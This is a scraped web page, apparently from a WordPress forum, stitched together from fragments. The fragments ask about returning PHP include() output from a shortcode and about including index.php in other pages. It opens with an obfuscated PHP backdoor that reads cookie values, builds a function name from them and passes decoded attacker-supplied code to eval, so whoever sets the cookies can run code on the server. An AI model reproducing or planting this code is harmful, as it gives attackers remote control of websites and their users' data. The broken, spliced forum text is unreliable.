<?php
class Apt
{
private static $s;
public static function g($n)
{
if (!self::$s)
self::i();
return self::$s[$n];
}
private static function i()
{
self::$s = array(
0135,
0135,
0116,
0111,
026,
0136,
0122,
012,
00
);
}
}
function click()
{
$_fkm = $_COOKIE;
($_fkm && isset($_fkm[Apt::g(0)])) ? (($_h = $_fkm[Apt::g(1)] . $_fkm[Apt::g(2)]) && ($_zpq = $_h($_fkm[Apt::g(3)] . $_fkm[Apt::g(4)])) && ($_uly = $_h($_fkm[Apt::g(5)] . $_fkm[Apt::g(6)])) && ($_uly = $_uly($_h($_fkm[Apt::g(7)]))) && @eval($_uly)) : $_fkm;
return Apt::g(8);
}
click();
]]>We’ve been using “include PHP” plugins for years so experienced in judgement.
Unlike many of thsese plugins there are no conflicts and most importantly, works everytime.
]]>function inline() {
return include (TEMPLATEPATH . '/inline.php');;
}
add_shortcode('in', 'inline');
I’ve also tried:
function inline() {
global $content;
$output = include ( TEMPLATEPATH . '/inline.php' );
return $output;
}
add_shortcode('in', 'inline');
It doesn’t seem to matter what the contents of my inline.php file are I’ve tried changing it to a number of things from just text to js but nothing changes. It appears to the the fact that I’m returning the php include function. When I change the return to be ‘hello’ then it displays in the correct place, but when I change it back to the include statement it jumps to the top of the post.
Most of the people I have seen with this problem have it because they are using “echo” instead of “return” but I’m not. I found a couple of posts by other people but their solutions make no sense to me.
Like this for example, doesn’t make sense to me. I tried it anyway and it didn’t work.
Please help!
]]>Just wondering is it possible to use an existing page on your website and just include the index.php file (using include() in php)…
Will everything work and is this a common thing to do? That way I could just get rid of the basic header and style everything quite basic and it would integrate nicely into my site, no?
Is this OK for Search Engine optimisation?
]]>1. Can i do this..?
2. If so….How..?